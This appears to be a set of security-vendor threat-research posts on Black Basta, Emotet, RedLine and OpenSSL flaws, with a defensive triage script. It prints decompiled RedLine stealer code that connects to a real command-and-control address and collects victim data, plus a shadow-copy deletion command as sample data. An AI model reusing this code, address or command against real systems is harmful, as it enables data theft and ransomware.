TOR chat with Black Basta ransomware operator runs dry

The SonicWall Capture Labs threat research team has recently been tracking a ransomware family called Black Basta. Black Basta first appeared in April 2022 and is believed to be operated by a well-organized cybercrime group called Fin7. It has been reported that this group has already breached over 90 organizations and caused over $1B USD in damage.

 

Infection Cycle:

 

Upon execution, a console appears with the following text:

 

It then quickly disables console output using the FreeConsole Windows API:

 

It obtains information about storage volumes attached to the system and begins its encryption process:

 

Encrypted files are given a “.basta” file extension.

 

The malware uses RSA encryption. The key is hardcoded and can be seen in the decompiled binary:

 

Various configuration options can also be seen in the decompiled code:

 

In order to prevent system recovery, the malware disables volume shadow copies using the vssadmin.exe program:

 

The malware drops dlaksjdoiq.jpg

 

dlaksjdoiq.jpg contains the following image:

 

A ransom message is written to readme.txt. This file is copied into all directories containing encrypted files:

 

readme.txt contains the following ransom message:

 

fkdjsadasd.ico is dropped onto the system:

 

It contains the following icon:

 

The Tor link leads to the following page:

 

After logging in using the requested information, a chat interface is presented:

 

We had the following conversation with the attacker but were unable to obtain information about file retrieval costs:

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: BlackBasta.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.
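
Added example (not SonicWall's code): a small triage pass over constructed Sysmon-style events that flags the behaviours described above: shadow-copy deletion through vssadmin.exe, a burst of files renamed to .basta, readme.txt written into several directories, and the dropped dlaksjdoiq.jpg / fkdjsadasd.ico pair. The event schema and the exact vssadmin arguments in the sample are assumptions.

```python
"""Triage rules for the Black Basta behaviours described in the post."""
import ntpath
import re
from collections import defaultdict

# Constructed Sysmon-style events (not real telemetry; the schema is a
# simplification assumed for this example).
SAMPLE_EVENTS = [
    {"kind": "process", "pid": 4312, "ppid": 1200,
     "image": r"C:\Users\alice\Downloads\invoice.exe",
     "cmdline": r"C:\Users\alice\Downloads\invoice.exe"},
    # Shadow copy deletion; the exact arguments are an assumption for the sample.
    {"kind": "process", "pid": 4400, "ppid": 4312,
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"kind": "file", "pid": 4312, "path": r"C:\Users\alice\Documents\q3.xlsx.basta"},
    {"kind": "file", "pid": 4312, "path": r"C:\Users\alice\Documents\readme.txt"},
    {"kind": "file", "pid": 4312, "path": r"C:\Users\alice\Pictures\cat.jpg.basta"},
    {"kind": "file", "pid": 4312, "path": r"C:\Users\alice\Pictures\readme.txt"},
    {"kind": "file", "pid": 4312, "path": r"C:\Users\alice\Desktop\notes.docx.basta"},
    {"kind": "file", "pid": 4312, "path": r"C:\Users\alice\Desktop\readme.txt"},
    {"kind": "file", "pid": 4312, "path": r"C:\Users\alice\AppData\Local\Temp\dlaksjdoiq.jpg"},
    {"kind": "file", "pid": 4312, "path": r"C:\Users\alice\AppData\Local\Temp\fkdjsadasd.ico"},
    # Benign activity that must not trigger anything.
    {"kind": "process", "pid": 5000, "ppid": 1200,
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},
    {"kind": "file", "pid": 5100, "path": r"C:\Projects\demo\readme.txt"},
]

SHADOW_DELETE = re.compile(r"\bdelete\s+shadows\b", re.IGNORECASE)
DROPPED_ARTEFACTS = {"dlaksjdoiq.jpg", "fkdjsadasd.ico"}   # names quoted in the post
NOTE_NAME = "readme.txt"
ENCRYPTED_EXT = ".basta"


def triage(events, min_encrypted=3, min_note_dirs=3):
    """Return a sorted list of (pid, rule) findings for Black Basta behaviours.

    Shadow-copy deletion is attributed to the parent that launched vssadmin.exe,
    since that is the process doing the encrypting.
    """
    findings = set()
    encrypted = defaultdict(int)    # pid -> number of *.basta files created
    note_dirs = defaultdict(set)    # pid -> directories that received readme.txt
    artefacts = defaultdict(set)    # pid -> dropped helper files seen

    for ev in events:
        if ev["kind"] == "process":
            image = ntpath.basename(ev["image"]).lower()
            if image == "vssadmin.exe" and SHADOW_DELETE.search(ev["cmdline"]):
                findings.add((ev.get("ppid", ev["pid"]), "shadow_copy_deletion"))
            continue
        name = ntpath.basename(ev["path"]).lower()
        if name.endswith(ENCRYPTED_EXT):
            encrypted[ev["pid"]] += 1
        elif name == NOTE_NAME:
            note_dirs[ev["pid"]].add(ntpath.dirname(ev["path"]).lower())
        elif name in DROPPED_ARTEFACTS:
            artefacts[ev["pid"]].add(name)

    for pid, count in encrypted.items():
        if count >= min_encrypted:
            findings.add((pid, "basta_extension_burst"))
    for pid, dirs in note_dirs.items():
        # A readme.txt alone is common; it is only a ransom note when the same
        # process also produced encrypted files.
        if len(dirs) >= min_note_dirs and encrypted.get(pid, 0) > 0:
            findings.add((pid, "ransom_note_spread"))
    for pid, names in artefacts.items():
        if names == DROPPED_ARTEFACTS:
            findings.add((pid, "black_basta_artefacts"))
    return sorted(findings)


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```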

Emotet Is Back!

Introduction

After several months of hiatus, Emotet is back. The SonicWall Capture Labs threat research team observed last week that the notorious malware, which heavily targets large organizations, has returned with tactics and functionality similar to those seen in past variants. Originally a banking trojan, Emotet has evolved into a dropper-type class of malware. It spreads through malicious Microsoft Office documents sent via email. Where JavaScript was used initially, VBA macros are now used to compromise victims’ machines.

Figure 1: Infection Chain

Infection Vector

The infection vector is Excel 4.0 macros, with the malicious code distributed across spreadsheet cells. By default, the Excel file opens in Protected View with macros disabled. To get around this, Emotet Excel files contain a single image with instructions (Figure 2) asking the user to copy the file to the <Microsoft Office>\Templates folder and open it again. This ensures that, with that single user interaction, the macros then execute seamlessly without a further prompt.

Figure 2: Malicious document warning. The required actions infect the machine.

The macro code contains multiple URLs from which the Emotet dropper DLL is downloaded.
URLs:
hxxp://app.clubdedocentes[.]com/storage/DCcq9ekgH99sI/
hxxp://linhkiendoc[.]com/app/payments/qoy5JqpLqrbsKl/
hxxp://sourcecool[.]com/throng/iOD/
hxxp://www.stickers-et-deco[.]com/Adapter/lYw/

Of these four URLs, only three were active at the time of analysis. They served three Emotet dropper DLLs with similar functionality. The DLLs are executed using regsvr32.exe.

Figure 3: View of the malicious VBA macro

DLL Analysis

Emotet is known for distributing many different malware families. During the analysis of two samples, no additional malware was observed being dropped or downloaded.

Sample 1

The dropper DLL contains highly obfuscated custom packer code, including the encrypted main Emotet DLL. Its imports include multiple APIs known to be used by malware, covering monitoring, enumeration, execution, encryption, persistence and exfiltration. Multiple APIs are loaded using DWORDs stored in memory (Figure 4).

Figure 4: Packed code shown in x64dbg

A custom decryption loop decrypts the main Emotet DLL using the key “vGZlfkkg?U^>+xzU”. Once regsvr32.exe executes it, the DLL is moved and renamed into “~\AppData\Local” and/or “\Windows\System32\” with a randomized name for both the parent folder and the file itself. A registry key is then created so that it autoruns when the system restarts (Figure 5).

Figure 5: Run Entry created for persistence

The process then attempts to reach out to multiple IP addresses with a generated cookie and the collected data. After initial communication with the CnC servers, it downloads a further Emotet spammer module to the same folder or to the “Appdata” directory.
For further spreading, the spammer module uses multiple malicious email templates like the one shown in Figure 6 below.


Figure 6: Email Template

It also uses a number of email domains, email addresses, their passwords and other information, including malicious email attachments, to spread across domains, as seen in Figure 7.

Figure 7: Email Addresses and Passwords

This illustrates the malware's redistribution mechanism for infecting further victims using already compromised email credentials.

Sample 2

This sample was a separate DLL that showed several differences in both code and behavior. Manually running the decryption function resulted in a DLL being created in newly allocated memory, but instead of a randomly named file it is called ‘clover.dll’ (Figure 8) and differs from the dropper in multiple ways.

Figure 8: Clover.dll allocated in memory

 

The first point is that when clover.dll is dropped, it lacks several of the anti-analysis features the original has; notably, one can go directly to the entry point in a debugger without the program terminating itself. There is also a string that produced only two Google results (f:\rtm\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl), both of which are samples on AlienVault OTX [i][ii].

Running ‘clover.dll’ with regsvr32.exe results in the same behavior as the dropper sample: it is moved to ~\AppData\Local, a registry key is created for persistence, and system enumeration begins. Regsvr32 then spawns a child process and kills the parent (Figure 9), becoming a ‘non-existent process’; this is an anti-analysis technique that prevents debuggers from attaching to the process.

Figure 9: This process does not exist (to a debugger)

The second point to note is the way Emotet communicates with the C2 servers: it uses regsvr32.exe to send TCP requests. None of the tools normally used for packet capture (Fiddler, Wireshark, TCPMon) showed the activity; only Procmon did. The entire communication occurs within 2-3 ms, as seen in Figures 10 and 11. Attempts to use netstat also failed.

Figure 10: Procmon output of TCP communications

Figure 11: Timestamps from beginning to end

Looking at the runtime memory of regsvr32, a large list of C2 addresses was found (Figure 12), along with cookie information and public keys.

Figure 12: Beginning of C2 list in private-mapped memory

 

SonicWall Real Time Deep Memory Inspection (RTDMI) detects the malicious Excel spreadsheet in Capture ATP. The Emotet dropper, Emotet DLL and spammer module are also detected by RTDMI.

Evidence of detection by the RTDMI™ engine for the Emotet DLL can be seen in the screenshot below:


Figure 13: RTDMI ATP Report results

IOCs

SHA256:

C2 IP Addresses:

URLs:

hxxp://app.clubdedocentes[.]com/storage/DCcq9ekgH99sI/
hxxp://linhkiendoc[.]com/app/payments/qoy5JqpLqrbsKl/
hxxp://sourcecool[.]com/throng/iOD/
hxxp://www.stickers-et-deco[.]com/Adapter/lYw/

Public Keys:

RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5z/VpKQADAJA=
RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2a/UNKQAXAJA=

JA3 fingerprint:

8916410db85077a5460817142dcbc8de

Cookies:

WnnMFWF=0d3850HcEUxB57edscLqHsb2YxPDCKbPSZncMTx3O0h9lQgJCvRMC//BrnYhPFxgMRGCoZSHhMyTtzRWyGhLZIyda+8qlUGgEDzQZ0FNyFIFUjbe0aBVe6vknvoT1bSoMmylmeeNjwtPr1DVQt8JBHpbWAXjxP+zpYCEPYLK2b02cC0/cJtzfFLcECfpMT9WAGpj2uFr6QqpTPIivkS/Ta2r9sHA20takVBoZ9TbfwVVtlUfqlozgTltkAtCazcU/W8R9mfAVM1Y

Qs=0WODCSXcomwJtgWqI5e4bPB3yrdQoAEow+xn5MRK9/ao9xobva9p8/jpU6RvJLwBpREszZe6f224Qoc20YVdaKXLpEoD+CwRklu0H7XCKQZe8V+CPjtzCo5fzkDm2SHBIMJmPkIdY0HZvSGjXBvSwpA74U8FBJdbzKmUSvZKeLE2D1zGVF25KW5b0s+FQ9ah7qgmwJxNkXCL7cbrL73Cnqi5G3XPALWmwxxRbX2F/rzzDxIkkxHSBI7ggXr5ndl799lGGQd4F0v171zhI+/VNrTtpcEnZM5drvJsD/wrrEGBY7NJUGIom7MjeZtu8/cOx+TR

[i]https://otx.alienvault.com/indicator/file/7fbcad6af8fc4b6aa18f877feabcfc31b0a4b1a4895ccaf70a90bceaff9331d2/

[ii]https://otx.alienvault.com/indicator/file/f8fa14b1f1d267d5c348d97f516ea9e6912f8747a6e659b45c428d931082f6e6

Microsoft Security Bulletin Coverage for November 2022

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2022. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2022-41057 Windows HTTP.sys Elevation of Privilege Vulnerability
ASPY 380: Malformed-File exe.MP_281

CVE-2022-41096 Microsoft DWM Core Library Elevation of Privilege Vulnerability
ASPY 381: Malformed-File exe.MP_282

CVE-2022-41109 Windows Win32k Elevation of Privilege Vulnerability
ASPY 382: Malformed-File exe.MP_287

CVE-2022-41113 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
ASPY 383: Malformed-File exe.MP_288

CVE-2022-41118 Windows Scripting Languages Remote Code Execution Vulnerability
IPS 15529: Windows Scripting Languages Remote Code Execution (CVE-2022-41118)

CVE-2022-41125 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
ASPY 384: Malformed-File exe.MP_289

The following vulnerabilities do not have exploits in the wild:
CVE-2022-37966 Windows Kerberos RC4-HMAC Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37967 Windows Kerberos Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37992 Windows Group Policy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38014 Windows Subsystem for Linux (WSL2) Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38015 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-38023 Netlogon RPC Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41039 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41044 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41045 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41047 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41048 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41049 Windows Mark of the Web Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-41050 Windows Extensible File Allocation Table Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41051 Azure RTOS GUIX Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41052 Windows Graphics Component Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41053 Windows Kerberos Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-41054 Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41055 Windows Human Interface Device Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41056 Network Policy Server (NPS) RADIUS Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-41058 Windows Network Address Translation (NAT) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-41060 Microsoft Word Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41061 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41062 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41063 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41064 .NET Framework Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41066 Microsoft Business Central Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41073 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41078 Microsoft Exchange Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-41079 Microsoft Exchange Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-41080 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41085 Azure CycleCloud Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41086 Windows Group Policy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41088 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41090 Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-41091 Windows Mark of the Web Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-41092 Windows Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41093 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41095 Windows Digital Media Receiver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41097 Network Policy Server (NPS) RADIUS Protocol Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41098 Windows GDI+ Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41099 BitLocker Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-41100 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41101 Windows Overlay Filter Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41102 Windows Overlay Filter Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41103 Microsoft Word Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41104 Microsoft Excel Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-41105 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41106 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41107 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41114 Windows Bind Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41116 Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-41119 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41120 Microsoft Windows Sysmon Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41122 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-41123 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41128 Windows Scripting Languages Remote Code Execution Vulnerability
There are no known exploits in the wild.

OpenSSL X509 Certificate Vulnerabilities

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  The OpenSSL Project develops and maintains the OpenSSL software, a robust, commercial-grade, full-featured toolkit for general-purpose cryptography and secure communication. OpenSSL contains an open-source implementation of the SSL and TLS protocols. The core library, written in the C programming language, implements basic cryptographic functions and provides various utility functions.

  Overview of OpenSSL Vulnerabilities:
    (CVE-2022-3602) ossl_punycode_decode(): punycode domain name “xn--” buffer overflow.
    (CVE-2022-3786) ossl_a2ulabel(): punycode string that includes a dot “.”, causing a buffer overflow.

  A stack-based buffer overflow can be triggered in the X.509 certificate verification process, specifically in the ossl_punycode_decode buffer.

  An attacker can craft a malicious certificate that overflows the ossl_punycode_decode buffer in multiple scenarios. This buffer overflow could result in a denial of service (DoS) or potentially remote code execution (RCE).

  Vendor Homepage

CVE Reference:

  The vulnerabilities have been assigned the Common Vulnerabilities and Exposures (CVE) identifiers:

    CVE-2022-3602 Listing
    CVE-2022-3786 Listing

Common Vulnerability Scoring System (CVSS):

  CVE-2022-3602 – Base 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C), Temporal 7.8 (E:POC/RL:OF/RC:C).
  CVE-2022-3786 – Base 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C), Temporal 5.8 (E:U/RL:OF/RC:C).

Technical Overview:

  Related to CVE-2022-3602:
    The vulnerability is a 4-byte (32-bit) buffer overflow caused by an off-by-one error inside OpenSSL’s Punycode decoder (ossl_punycode_decode) in punycode.c: the “max length” argument (unsigned int *pout_length) gives the number of elements allocated, but the decoder does not correctly verify that it stays within that bound. The vulnerable function ossl_punycode_decode() is responsible for parsing all sub-domains starting with “xn--”. This means that any Punycode string that decodes to exactly one more 32-bit character than the maximum length will overwrite the memory immediately following the decoded string.

  Related to CVE-2022-3786:
    The vulnerability exists in the ossl_a2ulabel function within punycode.c and is due to improper validation of Punycode-encoded strings. Memory addresses stored right after the buffer can be partially overwritten, which might lead to exploitable memory corruption. The code is mostly contained in an infinite while loop, which processes each label (i.e., the portions of the name between periods) until it runs out. If the label does not start with xn-- (i.e., it is a standard label), it is essentially copied directly into the output buffer. If the label does start with xn--, the else branch executes and decodes the Punycode-encoded string using the vulnerable ossl_punycode_decode function.

  The vulnerable Punycode functions are part of the libcrypto.so shared library (also libcrypto.a). They are reachable through the certificate-validation functions after certificate validation. With a trusted certificate, this can potentially affect any client application running a vulnerable version of OpenSSL.

Triggering the Problem:

  • The target must have the vulnerable software installed.
  • The attacker must have network connectivity to the target server.

Triggering Conditions:

  TLS Connections:
  Normal Client/Server handshake connection. (Server sends Certificate)
  Mutual Authentication handshake connection. (Server sends Certificate and Server Asks For Client Certificate)

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • SSL/TLS transport mechanisms such as (HTTPS, SMTPS, SIPS, etc…)

  CVE-2022-3602 Attack Packet:
  
  CVE-2022-3786 Attack Packet:
  

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 3332 OpenSSL X.509 Name Constraint Check Buffer Overflow
  • IPS: 3335 OpenSSL X.509 Name Constraint Check Buffer Overflow 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Upgrading the product to a non-vulnerable version.
    • Detecting and filtering malicious traffic using the signatures above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Follina Vulnerability is being used to deliver Redline info stealer

Introduction

Malware authors have been extensively using C# to build malware for the last few years, due to its simplicity and rich Application Programming Interfaces (APIs). RedLine is an advanced info stealer written in C# that has been active in the wild since 2020; it is available as Malware-as-a-Service (MaaS) on underground forums, by subscription or one-time purchase. RedLine initially spread by sharing Uniform Resource Locators (URLs) in emails for the victim to download, but that method needed human intervention to execute the downloaded payload. Recently, RedLine has started using the Follina exploit targeting CVE-2022-30190, the Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability; this method triggers in-memory execution of the malware instead of saving it to disk. The RedLine code is visibly simple yet has vast functionality. The delivery and execution mechanism involves additional layers to prevent detection and analysis of the malware. RedLine steals installed browser data, digital wallets, FTP data, VPN data, Telegram files, Discord tokens and geographical data, and captures the screen.

 

Protection Layers

Protection layers are applied recursively, each one producing and executing the next-level binary until the final payload is reached, to prevent detection and static analysis of the main payload.

Layer 1

The first binary contains an encrypted resource entry named “Helper_Classes”. RC2 decryption with the key ‘0989B3A46874B279F1BF795ED112CE22’ (the MD5 of a string), Electronic Code Book (ECB) mode and PKCS7 padding yields the next-layer binary. The second-layer binary is loaded and executed using reflection APIs.

 

Layer 2

The second binary contains an Advanced Encryption Standard (AES) encrypted resource entry named “Tesla”. AES with the key ‘AB6EDF45E299A7B2968A9D7CD013C1164EFC6165508D691F085B7D9462EE945B’ (the SHA256 of a string) in ECB mode yields the next-layer binary. An export function from the third binary is invoked using reflection APIs, passing the current executable path and the payload binary bytes. The malware creates its persistence entry by copying itself into ‘%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\.exe’ using a PowerShell command (cmdlet).

Layer 3

This third binary is an obfuscated variant of the RunPE module published on GitHub by the author NYAN CAT. The module accepts two arguments, the executable file path and the payload bytes. A new process is created for the provided file path and process hollowing is used to execute the RedLine payload bytes.

 

RedLine Execution

The execution of the RedLine info stealer starts from the main method, which creates an object of the EntryPoint class. The constructor initializes the Command and Control (C&C) IP address list, the release identifier, the message for the victim and the decryption key. For this variant the key is left empty, as the fields, including the C&C IP address list, are not encrypted. The constructor also invokes unmanaged code APIs to hide the process console.

public EntryPoint()
{
    NativeHelper.Hide();
    IP = "45.155.165.19:24150";
    ID = "rule";
    Message = "";
    Key = "";
}

After initialization, the Execute method is invoked; it controls the complete execution flow, starting by establishing a connection with the C&C server using a Simple Object Access Protocol (SOAP) API over Hypertext Transfer Protocol Secure (HTTPS). The malware tries to connect to one of the IP addresses from the C&C list, separated by “|”, at an interval of 5 seconds until a connection is established.

bool flag = false;
while (!flag)
{
    string[] array = StringDecrypt.Decrypt(entry.IP, entry.Key).Split(new string[1] { "|" }, StringSplitOptions.RemoveEmptyEntries);
    foreach (string address in array)
    {
        if (endpointConnection.RequestConnection(address) && endpointConnection.TryGetConnection())
        {
            flag = true;
            break;
        }
    }
    Thread.Sleep(5000);
}

 

An object of the ScanningArgs class is instantiated; it contains configuration information, including flags that control the various actions on the victim’s machine, lists of directory paths to scan, and attributes that terminate the malware's execution.

public class ScanningArgs
{
    public bool ScanBrowsers { get; set; }
    public bool ScanFiles { get; set; }
    public bool ScanFTP { get; set; }
    public bool ScanWallets { get; set; }
    public bool ScanScreen { get; set; }
    public bool ScanTelegram { get; set; }
    public bool ScanVPN { get; set; }
    public bool ScanSteam { get; set; }
    public bool ScanDiscord { get; set; }
    public List<string> ScanFilesPaths { get; set; }
    public List<string> BlockedCountry { get; set; }
    public List<string> BlockedIP { get; set; }
    public List<string> ScanChromeBrowsersPaths { get; set; }
    public List<string> ScanGeckoBrowsersPaths { get; set; }
}

 

A new ScanningArgs object is received from the C&C server to update the default configuration object.

while (!endpointConnection.TryGetArgs(out args))
{
    if (!endpointConnection.TryGetConnection())
    {
        throw new Exception();
    }
    Thread.Sleep(1000);
}

 

The BlockedCountry and BlockedIP lists are empty for this variant. ScanFilesPaths contains the list of file information to be collected from the victim’s machine, ScanChromeBrowsersPaths contains the paths of the user data directories of Chromium-based browsers, and ScanGeckoBrowsersPaths contains the paths of the user data directories of Gecko-based browsers:

Two structures are used by the malware to store the information stolen from the compromised machine. ScanResult is the main structure; it stores the basic information and a reference to another structure, ScanDetails (an object, referred to here as a structure), which stores the advanced information.

public struct ScanResult
{
    public string Hardware { get; set; }
    public string ReleaseID { get; set; }
    public string MachineName { get; set; }
    public string OSVersion { get; set; }
    public string Language { get; set; }
    public string Resolution { get; set; }
    public ScanDetails ScanDetails { get; set; }
    public string Country { get; set; }
    public string City { get; set; }
    public string TimeZone { get; set; }
    public string IPv4 { get; set; }
    public byte[] Monitor { get; set; }
    public string ZipCode { get; set; }
    public string FileLocation { get; set; }
    public bool SeenBefore { get; set; }
}

 

ScanResult.ScanDetails = new ScanDetails
{
    AvailableLanguages = new List<string>(),
    Browsers = new List<ScannedBrowser>(),
    FtpConnections = new List<Account>(),
    GameChatFiles = new List<ScannedFile>(),
    GameLauncherFiles = new List<ScannedFile>(),
    InstalledBrowsers = new List<BrowserVersion>(),
    MessageClientFiles = new List<ScannedFile>(),
    NordAccounts = new List<Account>(),
    Open = new List<ScannedFile>(),
    Processes = new List<string>(),
    Proton = new List<ScannedFile>(),
    ScannedFiles = new List<ScannedFile>(),
    ScannedWallets = new List<ScannedFile>(),
    SecurityUtils = new List<string>(),
    Softwares = new List<string>(),
    SystemHardwares = new List<SystemHardware>()
};

 

The malware retrieves geographical information using one of the URLs below and initializes the IPv4, City, Country and ZipCode fields of the ScanResult structure.

  • ‘https://api.ip.sb/geoip’
  • ‘https://ipinfo.io/ip’
  • ‘https://api.ipify.org’

 

The malware terminates its execution if the country or IP address of the compromised machine belongs to its list of blocked countries or blocked IPs, respectively.

public static void AKSFD8H23(ScanningArgs settings, ref ScanResult result)
{
    GeoInfo geoInfo = GeoHelper.Get();
    geoInfo.IP = (string.IsNullOrWhiteSpace(geoInfo.IP) ? "UNKNOWN" : geoInfo.IP);
    geoInfo.Location = (string.IsNullOrWhiteSpace(geoInfo.Location) ? "UNKNOWN" : geoInfo.Location);
    geoInfo.Country = (string.IsNullOrWhiteSpace(geoInfo.Country) ? "UNKNOWN" : geoInfo.Country);
    geoInfo.PostalCode = (string.IsNullOrWhiteSpace(geoInfo.PostalCode) ? "UNKNOWN" : geoInfo.PostalCode);
    List<string> blockedCountry = settings.BlockedCountry;
    if (blockedCountry != null && blockedCountry.Count > 0 && settings.BlockedCountry.Contains(geoInfo.Country))
    {
        Environment.Exit(0);
    }
    List<string> blockedIP = settings.BlockedIP;
    if (blockedIP != null && blockedIP.Count > 0 && settings.BlockedIP.Contains(geoInfo.IP))
    {
        Environment.Exit(0);
    }
    result.IPv4 = geoInfo.IP;
    result.City = geoInfo.Location;
    result.Country = geoInfo.Country;
    result.ZipCode = geoInfo.PostalCode;
}

 

The malware contains 22 action methods to collect data and perform tasks on the compromised machine. The methods are invoked dynamically in random order, and some of them act based on the flag values from the ScanningArgs object.

Actions = new ParsingStep[22] {
    asdkadu8, sdfo8n234, sdfi35sdf, sdf934asd, asdk9345asd, a03md9ajsd, asdk8jasd, лыв7рыва2, ылв92р34выа, аловй, ыал8р45, ываш9р34, длвап9345, ывал8н34, вал93тфыв, вашу0л34, навева, ащы9р34, ыва83о4тфыв, askd435, sdi845sa, asd44123
};
Random rnd = new Random();
Actions = Actions.OrderBy((ParsingStep x) => rnd.Next()).ToArray();
Actions = new ParsingStep[22] {
    asdkadu8, sdfo8n234, sdfi35sdf, sdf934asd, asdk9345asd, a03md9ajsd, asdk8jasd, лыв7рыва2, ылв92р34выа, аловй, ыал8р45, ываш9р34, длвап9345, ывал8н34, вал93тфыв, вашу0л34, навева, ащы9р34, ыва83о4тфыв, askd435, sdi845sa, asd44123
};
foreach (ParsingStep parsingStep in actions)
{
    try
    {
        parsingStep(settings, ref result);
    }
    catch
    {
    }
}

 

Action Methods

Action methods fill the ScanResult and ScanDetails structures with data stolen from the compromised machine.

 

  1. asdkadu8 (HardwareID)

Retrieves the domain name, username and serial number from the compromised machine, concatenates them and computes the MD5 hash. The MD5 hash is assigned to the Hardware field of the ScanResult structure. Threat actors can use this field to identify the compromised machine.

ScanResult.Hardware = CryptoHelper.GetMd5Hash(Environment.UserDomainName + Environment.UserName + SystemInfoHelper.GetSerialNumber()).Replace("-", string.Empty);

 

  2. sdfo8n234 (ExecutableLocation)

The file path of the running executable is assigned to the FileLocation field of the ScanResult structure.

ScanResult.FileLocation = Assembly.GetExecutingAssembly().Location;

  3. sdfi35sdf (OSInfo)

Retrieves the input language, time zone and operating system (OS) version of the compromised machine and assigns them to the Language, TimeZone and OSVersion fields of the ScanResult structure, respectively.

ScanResult.Language = InputLanguage.CurrentInputLanguage.Culture.EnglishName;
ScanResult.TimeZone = TimeZoneInfo.Local.DisplayName;
